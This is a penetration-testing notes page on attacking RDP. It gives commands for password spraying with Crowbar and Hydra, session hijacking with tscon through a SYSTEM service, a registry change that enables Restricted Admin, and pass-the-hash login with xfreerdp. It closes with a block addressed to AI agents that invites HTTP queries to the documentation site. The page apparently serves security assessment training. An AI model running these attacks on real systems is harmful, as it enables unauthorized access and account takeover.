# RDP By default, RDP uses port `TCP/3389` ```bash nmap -Pn -p3389 ``` ## Misconfigurations Since RDP takes user credentials for authentication, one common attack vector against the RDP protocol is password guessing. Although it is not common, we could find an RDP service without a password if there is a misconfiguration. Using the [Crowbar](https://github.com/galkan/crowbar) tool, we can perform a password spraying attack against the RDP service. ```bash crowbar -b rdp -s /32 -U users.txt -c 'password123' ``` We can also use `Hydra` to perform an RDP password spray attack. ```bash hydra -L usernames.txt -p 'password123' rdp ``` We can RDP into the target system using the `rdesktop` client or `xfreerdp` client with valid credentials. ```bash rdesktop -u admin -p password123 ``` ## Protocol Specific Attacks **RDP Session Hijacking** If a user is connected via RDP to our compromised machine, we can hijack the user's remote desktop session to escalate our privileges and impersonate the account. In an Active Directory environment, this could result in us taking over a Domain Admin account or furthering our access within the domain. Find the logged in sessions by using: ```powershell query user ``` To successfully impersonate a user without their password, we need to have `SYSTEM` privileges and use the Microsoft [tscon.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tscon) binary that enables users to connect to another desktop session. ```cmd-session tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} ``` If we have local administrator privileges, we can use several methods to obtain `SYSTEM` privileges, such as [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) or [Mimikatz](https://github.com/gentilkiwi/mimikatz). A simple trick is to create a Windows service that, by default, will run as `Local System` and will execute any binary with `SYSTEM` privileges. We will use [Microsoft sc.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create) binary. ```batch sc.exe create sessionhijack binpath="cmd.exe /k tscon /dest:" net start sessionhijack ``` ## PtH RDP There are a few caveats to this attack: * `Restricted Admin Mode`, which is disabled by default, should be enabled on the target host; otherwise, we will be prompted with the following error:
This can be enabled by adding a new registry key `DisableRestrictedAdmin` (REG\_DWORD) under `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa`. It can be done using the following command: ```powershell reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f ``` Once the registry key is added, we can use `xfreerdp` with the option `/pth` to gain RDP access: ```shell-session xfreerdp /v: /u:lewen /pth: ``` If it works, we'll now be logged in via RDP as the target user without knowing their cleartext password. Keep in mind that this will not work against every Windows system we encounter, but it is always worth trying in a situation where we have an NTLM hash, know the user has RDP rights against a machine or set of machines, and GUI access would benefit us in some ways towards fulfilling the goal of our assessment. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.rtlcopymemory.com/attacking-common-services/rdp.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.